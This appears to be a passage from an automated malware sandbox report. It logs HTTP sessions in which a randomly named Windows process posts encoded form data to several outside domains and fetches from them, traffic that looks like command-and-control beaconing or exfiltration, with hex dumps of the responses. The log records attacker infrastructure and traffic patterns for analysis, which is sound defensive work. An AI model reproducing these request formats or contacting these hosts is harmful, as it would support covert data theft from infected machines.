1h9gIxkULQDYBQOeEY49HA3AJpe4N++rkOMBkNgnyBQPpyxddLsIjY/zCTDPXXf7Y+1ON6e3Vld+eqMtic7XMceTp+rR0tDqahoKoZIChJC/p/iH54iflRBW2+6gQelbXQYxo8aPIWHrdV7ymdLqErsTvNogUfR1H1yOf43spH9zTZGTQURPZnxh0N4/m0oQnjYRcxjkatfMSaM84VOxQ42FM [TRUNCATED]
Jan 6, 2025 16:04:29.934453964 CET	475	IN	HTTP/1.1 404 Not Found Server: nginx-reuseport/1.21.1 Date: Mon, 06 Jan 2025 15:04:29 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 65 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f c3 30 0c 85 ef fd 15 66 27 38 10 97 a9 93 38 58 91 60 ed c4 a4 32 2a 48 0f 1c 03 31 4a a5 d1 94 24 5b 81 5f 4f da 09 69 17 4b cf fe 9e f5 1e 5d 94 4f 6b f5 da 54 f0 a0 1e 6b 68 da fb 7a bb 86 c5 35 e2 b6 52 1b c4 52 95 a7 cb 52 e4 88 d5 6e 21 33 b2 f1 73 2f c9 b2 36 49 c4 2e ee 59 16 79 01 3b 17 61 e3 0e bd 21 3c 2d 33 c2 19 a2 37 67 7e 26 df 8d 3c 63 92 ca 68 90 ca 32 78 fe 3a 70 88 6c a0 7d ae 61 d4 01 fa c4 7d 4c 1c b8 1e a2 ed 02 04 f6 47 f6 82 70 98 3e f9 34 b4 31 9e 43 90 77 83 7e b7 8c 4b 51 88 d5 0a 2e db be fb be 82 97 19 07 1d 61 1c 47 11 dc f1 57 0c de 41 e3 7c 84 db 9c f0 df 9c 32 ce e9 52 9e a9 55 f6 07 a8 23 d4 61 10 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e6MAO0f'88X`2*H1J$[_OiK]OkTkhz5RRRn!3s/6I.Yy;a!<-37g~&<ch2x:pl}a}LGp>41Cw~KQ.aGWA\|2RU#a0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.8	60438	45.130.41.107	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:04:31.159706116 CET	475	OUT	GET /vwha/?56-H=2t2xuzpX2&O2ePNNH0=+1TlPe1iHurJgrUo1Fh4jMYCUgN6dLJjaWb71SZDhLRDbzxX1n644MdDCZJQOu7CS35CxiD5o0aG0rIRj2YKEjTjVAEexEL7h/EXKKKoC/rP/dgEVjb+3KEnGAuUy2xLnw== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.sovz.pro Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Jan 6, 2025 16:04:32.004625082 CET	475	IN	HTTP/1.1 404 Not Found Server: nginx-reuseport/1.21.1 Date: Mon, 06 Jan 2025 15:04:31 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 272 Connection: close Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 6f 76 7a 2e 70 72 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.sovz.pro Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.8	60439	85.159.66.93	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:04:37.301548004 CET	766	OUT	POST /l5cx/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.tabyscooterrentals.xyz Origin: http://www.tabyscooterrentals.xyz Referer: http://www.tabyscooterrentals.xyz/l5cx/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 209 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 2f 53 68 71 6e 71 70 51 54 77 6f 56 35 78 34 49 7a 42 5a 67 77 54 64 51 7a 37 6a 47 6b 59 54 6e 39 69 53 38 37 6a 41 2f 6a 44 49 59 39 4c 69 49 30 61 35 7a 66 75 6d 75 58 43 52 58 57 61 72 35 72 4b 54 4b 71 71 76 41 72 56 6d 58 38 31 2f 51 4f 6e 67 38 61 61 73 4f 67 7a 4b 6c 6d 50 73 50 71 77 4c 31 55 4a 61 4b 42 69 67 2f 47 70 36 2f 36 54 4e 63 36 6b 63 61 59 31 39 4b 32 31 41 41 6b 56 52 37 4f 4a 35 57 62 74 67 4c 2b 49 78 41 48 70 6f 75 49 76 76 72 49 63 64 78 50 72 41 34 64 4a 43 54 71 38 65 65 46 56 42 4f 48 48 6e 61 47 41 4c 77 77 42 45 32 6c 49 71 54 64 6c 69 58 72 58 6e 72 57 2b 4d 3d Data Ascii: O2ePNNH0=/ShqnqpQTwoV5x4IzBZgwTdQz7jGkYTn9iS87jA/jDIY9LiI0a5zfumuXCRXWar5rKTKqqvArVmX81/QOng8aasOgzKlmPsPqwL1UJaKBig/Gp6/6TNc6kcaY19K21AAkVR7OJ5WbtgL+IxAHpouIvvrIcdxPrA4dJCTq8eeFVBOHHnaGALwwBE2lIqTdliXrXnrW+M=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.8	60440	85.159.66.93	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:04:39.854856968 CET	786	OUT	POST /l5cx/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.tabyscooterrentals.xyz Origin: http://www.tabyscooterrentals.xyz Referer: http://www.tabyscooterrentals.xyz/l5cx/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 229 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 2f 53 68 71 6e 71 70 51 54 77 6f 56 2f 68 49 49 77 6d 46 67 32 7a 64 54 38 62 6a 47 39 6f 53 75 39 69 75 38 37 6e 34 56 6a 58 6b 59 39 70 36 49 79 76 46 7a 53 4f 6d 75 44 53 51 66 59 36 72 79 72 4b 66 64 71 76 76 41 72 56 43 58 38 78 37 51 4f 55 49 7a 61 4b 73 4d 6f 54 4b 6a 37 66 73 50 71 77 4c 31 55 4a 65 67 42 6d 4d 2f 46 59 4b 2f 37 79 4e 64 77 45 63 5a 50 46 39 4b 68 46 42 4a 6b 56 52 5a 4f 4e 78 34 62 75 59 4c 2b 4e 56 41 48 34 6f 70 44 76 76 74 46 38 63 76 65 5a 39 44 53 70 47 31 68 38 32 6c 4d 48 51 30 47 78 57 77 63 69 44 32 7a 42 73 64 6c 4c 43 6c 59 53 2f 2f 78 30 33 62 49 70 5a 5a 67 61 33 4a 64 30 78 61 6c 6a 63 41 58 74 2f 34 2b 44 64 76 Data Ascii: O2ePNNH0=/ShqnqpQTwoV/hIIwmFg2zdT8bjG9oSu9iu87n4VjXkY9p6IyvFzSOmuDSQfY6ryrKfdqvvArVCX8x7QOUIzaKsMoTKj7fsPqwL1UJegBmM/FYK/7yNdwEcZPF9KhFBJkVRZONx4buYL+NVAH4opDvvtF8cveZ9DSpG1h82lMHQ0GxWwciD2zBsdlLClYS//x03bIpZZga3Jd0xaljcAXt/4+Ddv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.8	60441	85.159.66.93	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:04:42.400264978 CET	1803	OUT	POST /l5cx/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.tabyscooterrentals.xyz Origin: http://www.tabyscooterrentals.xyz Referer: http://www.tabyscooterrentals.xyz/l5cx/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1245 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 2f 53 68 71 6e 71 70 51 54 77 6f 56 2f 68 49 49 77 6d 46 67 32 7a 64 54 38 62 6a 47 39 6f 53 75 39 69 75 38 37 6e 34 56 6a 57 77 59 39 36 79 49 78 49 52 7a 54 4f 6d 75 66 69 51 63 59 36 72 72 72 4b 48 52 71 76 72 51 72 58 71 58 7a 79 6a 51 49 68 38 7a 51 4b 73 4d 6b 7a 4b 69 6d 50 73 57 71 78 6d 2b 55 4a 75 67 42 6d 4d 2f 46 62 53 2f 79 44 4e 64 2f 6b 63 61 59 31 39 57 32 31 42 6c 6b 56 4a 7a 4f 4e 31 47 61 65 34 4c 35 74 46 41 46 4b 41 70 42 50 76 76 4c 63 63 6e 65 5a 78 63 53 70 4b 54 68 38 79 50 4d 46 41 30 48 48 37 6d 4c 53 33 7a 77 78 30 52 67 38 75 7a 41 51 32 5a 35 79 2f 55 50 49 4e 41 67 65 54 4b 61 33 64 48 6c 6b 46 6e 42 4b 71 33 76 6b 77 61 54 78 38 59 35 57 4d 53 62 2b 67 58 36 43 30 46 57 45 72 34 41 7a 41 44 32 39 30 58 68 31 6b 49 71 71 48 32 75 51 54 74 38 46 65 57 64 30 49 33 6f 56 41 42 2b 33 46 42 53 77 6e 61 51 6b 72 33 72 44 31 79 39 56 47 6d 62 4d 48 6a 30 6e 70 6f 35 64 6a 48 77 2b 46 4a 63 76 68 44 30 65 57 4a 6d 50 36 59 7a 6e 6b 72 2b 69 55 75 67 [TRUNCATED] Data Ascii: O2ePNNH0=/ShqnqpQTwoV/hIIwmFg2zdT8bjG9oSu9iu87n4VjWwY96yIxIRzTOmufiQcY6rrrKHRqvrQrXqXzyjQIh8zQKsMkzKimPsWqxm+UJugBmM/FbS/yDNd/kcaY19W21BlkVJzON1Gae4L5tFAFKApBPvvLccneZxcSpKTh8yPMFA0HH7mLS3zwx0Rg8uzAQ2Z5y/UPINAgeTKa3dHlkFnBKq3vkwaTx8Y5WMSb+gX6C0FWEr4AzAD290Xh1kIqqH2uQTt8FeWd0I3oVAB+3FBSwnaQkr3rD1y9VGmbMHj0npo5djHw+FJcvhD0eWJmP6Yznkr+iUugpDBTVpenbQlpbJtyu/yzNnMWlHZufA3LyeI2KynTMD25f1ajMOumc9KOBDmIXZ59pEiXfmuSC0AX3xK3fHiZF3VKIu8ZEyNhc5uFtIoX/iqJMBSo1y0v63nnaqGOZxgV6afw6wwlqdoqxmocsUjxJ57t5Ttv9ju7mwaoNXBuz+Lcu3PMYMpIxN/4TgJ5Y8U/t0J4KNyCz8sR3R81er/GVp+acDq87f2KtZtT0nUzd5rDYEy+xepJcVEs3Og7a1/wish6sQ6BAjnxDWkwRyJhU+irbH9s0Z5WEeQIDNMl27XbTiJoMzaZtPkmKhgksYZl8e18t43jLHr27D6xdKbxim2z6ncQFeMgToQbnIOTqhx09B4zxBdCrYf641LfJVveuprQ8YmlzoIA4K8BdVDdPwGrhfd1wbKojmNY1i+K3ZqdYCOPb0tadAQ75MIGeo0zKTGqZPboDHrCREyHADbX5Tpr1ztAqMSdamHk8Dwkg4JEoH2ZQINAXDMOK89n0YKB4UhdTR+/Asg/Cu+CcNwkRTic/bHAlpSwaTO4Pdu3IOJ0gNWj/nKEo+dIHReB9F91EqP/N9Y97K6l/NdFmKkD8NK40ys+q8pxYnoZ1Ng0JKgpHXWmBRRN7Eb+jrXQMBCQumxfySVFGRVg9c129SlSq1fXaJELvkYLk0 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.8	60442	85.159.66.93	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:04:44.941634893 CET	489	OUT	GET /l5cx/?O2ePNNH0=yQJKkfxWdg40vhwKwT0yo2Rd/5PUpL2s8gKbzV8myB83hLOXrLVtbOGyahZiWqLsl6rE8IHzhGOG+V3nBGIGQagN3QWVkeUo3Ve4Asu3MWt+IqOvzDkO73IjfDsXnTMMww==&56-H=2t2xuzpX2 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.tabyscooterrentals.xyz Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Jan 6, 2025 16:04:45.649457932 CET	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Mon, 06 Jan 2025 15:04:45 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2025-01-06T15:04:50.5333945Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.8	60443	199.59.243.228	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:04:50.761817932 CET	727	OUT	POST /gott/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.sql.dance Origin: http://www.sql.dance Referer: http://www.sql.dance/gott/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 209 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 33 6d 42 70 35 2f 52 35 31 32 32 73 6b 78 74 30 67 77 50 47 35 50 33 51 35 63 58 49 68 62 71 2b 64 4f 72 76 43 41 66 50 2f 42 57 5a 4f 42 37 46 4f 62 6e 45 76 78 48 44 68 64 73 62 48 4d 62 36 41 54 63 4e 47 58 4a 45 6a 44 55 54 51 55 45 62 6e 65 76 31 71 4a 4c 62 45 64 6a 30 43 76 4d 62 58 31 5a 4b 2f 71 61 52 61 35 62 41 6a 63 6d 78 76 79 66 33 67 61 4d 4e 34 4f 58 43 67 6e 6f 6e 4e 6d 46 67 6c 6d 75 58 61 6a 52 6d 4e 47 70 6e 77 52 63 68 53 77 44 5a 77 66 4d 73 7a 72 42 62 56 33 39 7a 72 7a 63 72 78 61 57 6b 70 62 31 67 43 65 66 67 55 63 6f 44 47 39 49 38 53 50 73 30 61 43 61 4a 6c 2b 77 3d Data Ascii: O2ePNNH0=3mBp5/R5122skxt0gwPG5P3Q5cXIhbq+dOrvCAfP/BWZOB7FObnEvxHDhdsbHMb6ATcNGXJEjDUTQUEbnev1qJLbEdj0CvMbX1ZK/qaRa5bAjcmxvyf3gaMN4OXCgnonNmFglmuXajRmNGpnwRchSwDZwfMszrBbV39zrzcrxaWkpb1gCefgUcoDG9I8SPs0aCaJl+w=
Jan 6, 2025 16:04:51.212167025 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 06 Jan 2025 15:04:50 GMT content-type: text/html; charset=utf-8 content-length: 1102 x-request-id: 97b3d22a-5d9b-49d9-ac1f-e09eb02a15d1 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_q6rEi3cXlE0A7goXoI3FjDpe2Ir0tGq6ibMjuVVLgMyJ563tlzHI9zVy3DB/x8Lmoo3jCm5bNtluhFh3SdlHpg== set-cookie: parking_session=97b3d22a-5d9b-49d9-ac1f-e09eb02a15d1; expires=Mon, 06 Jan 2025 15:19:51 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 71 36 72 45 69 33 63 58 6c 45 30 41 37 67 6f 58 6f 49 33 46 6a 44 70 65 32 49 72 30 74 47 71 36 69 62 4d 6a 75 56 56 4c 67 4d 79 4a 35 36 33 74 6c 7a 48 49 39 7a 56 79 33 44 42 2f 78 38 4c 6d 6f 6f 33 6a 43 6d 35 62 4e 74 6c 75 68 46 68 33 53 64 6c 48 70 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_q6rEi3cXlE0A7goXoI3FjDpe2Ir0tGq6ibMjuVVLgMyJ563tlzHI9zVy3DB/x8Lmoo3jCm5bNtluhFh3SdlHpg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 6, 2025 16:04:51.212187052 CET	555	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTdiM2QyMmEtNWQ5Yi00OWQ5LWFjMWYtZTA5ZWIwMmExNWQxIiwicGFnZV90aW1lIjoxNzM2MTc1OD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.8	60444	199.59.243.228	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:04:53.309426069 CET	747	OUT	POST /gott/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.sql.dance Origin: http://www.sql.dance Referer: http://www.sql.dance/gott/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 229 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 33 6d 42 70 35 2f 52 35 31 32 32 73 6b 52 64 30 6e 6a 33 47 70 66 33 58 33 38 58 49 34 4c 72 33 64 4f 76 76 43 45 48 6d 2b 31 36 5a 4f 6a 6a 46 50 5a 50 45 75 78 48 44 71 39 74 66 4b 73 62 78 41 54 52 77 47 57 31 45 6a 44 6f 54 51 56 30 62 6e 4e 33 71 72 5a 4c 5a 49 39 6a 79 50 50 4d 62 58 31 5a 4b 2f 75 79 33 61 35 44 41 6a 74 57 78 39 67 6e 77 74 36 4d 4f 2f 4f 58 43 71 48 6f 6a 4e 6d 46 43 6c 6b 61 78 61 68 5a 6d 4e 47 35 6e 7a 46 77 69 5a 77 44 58 30 66 4e 34 69 61 67 33 4d 31 74 42 74 42 55 50 78 4c 76 63 68 4e 45 4b 59 38 58 6d 58 63 41 6f 47 2b 67 4b 58 34 78 63 41 68 4b 35 37 70 6b 57 6d 7a 64 62 4c 71 6e 77 75 38 51 38 43 32 4d 6e 62 48 6d 56 Data Ascii: O2ePNNH0=3mBp5/R5122skRd0nj3Gpf3X38XI4Lr3dOvvCEHm+16ZOjjFPZPEuxHDq9tfKsbxATRwGW1EjDoTQV0bnN3qrZLZI9jyPPMbX1ZK/uy3a5DAjtWx9gnwt6MO/OXCqHojNmFClkaxahZmNG5nzFwiZwDX0fN4iag3M1tBtBUPxLvchNEKY8XmXcAoG+gKX4xcAhK57pkWmzdbLqnwu8Q8C2MnbHmV
Jan 6, 2025 16:04:53.765609026 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 06 Jan 2025 15:04:53 GMT content-type: text/html; charset=utf-8 content-length: 1102 x-request-id: 5eee251a-a433-453f-8bf3-9d57c7a6e2ed cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_q6rEi3cXlE0A7goXoI3FjDpe2Ir0tGq6ibMjuVVLgMyJ563tlzHI9zVy3DB/x8Lmoo3jCm5bNtluhFh3SdlHpg== set-cookie: parking_session=5eee251a-a433-453f-8bf3-9d57c7a6e2ed; expires=Mon, 06 Jan 2025 15:19:53 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 71 36 72 45 69 33 63 58 6c 45 30 41 37 67 6f 58 6f 49 33 46 6a 44 70 65 32 49 72 30 74 47 71 36 69 62 4d 6a 75 56 56 4c 67 4d 79 4a 35 36 33 74 6c 7a 48 49 39 7a 56 79 33 44 42 2f 78 38 4c 6d 6f 6f 33 6a 43 6d 35 62 4e 74 6c 75 68 46 68 33 53 64 6c 48 70 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_q6rEi3cXlE0A7goXoI3FjDpe2Ir0tGq6ibMjuVVLgMyJ563tlzHI9zVy3DB/x8Lmoo3jCm5bNtluhFh3SdlHpg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 6, 2025 16:04:53.765634060 CET	555	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNWVlZTI1MWEtYTQzMy00NTNmLThiZjMtOWQ1N2M3YTZlMmVkIiwicGFnZV90aW1lIjoxNzM2MTc1OD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.8	60445	199.59.243.228	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:04:55.850783110 CET	1764	OUT	POST /gott/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.sql.dance Origin: http://www.sql.dance Referer: http://www.sql.dance/gott/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1245 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 33 6d 42 70 35 2f 52 35 31 32 32 73 6b 52 64 30 6e 6a 33 47 70 66 33 58 33 38 58 49 34 4c 72 33 64 4f 76 76 43 45 48 6d 2b 30 75 5a 4f 77 72 46 4f 2b 54 45 74 78 48 44 6a 64 74 63 4b 73 62 57 41 54 35 30 47 57 35 55 6a 46 6b 54 51 7a 67 62 7a 6f 62 71 67 5a 4c 5a 56 74 6a 7a 43 76 4d 30 58 31 4a 77 2f 71 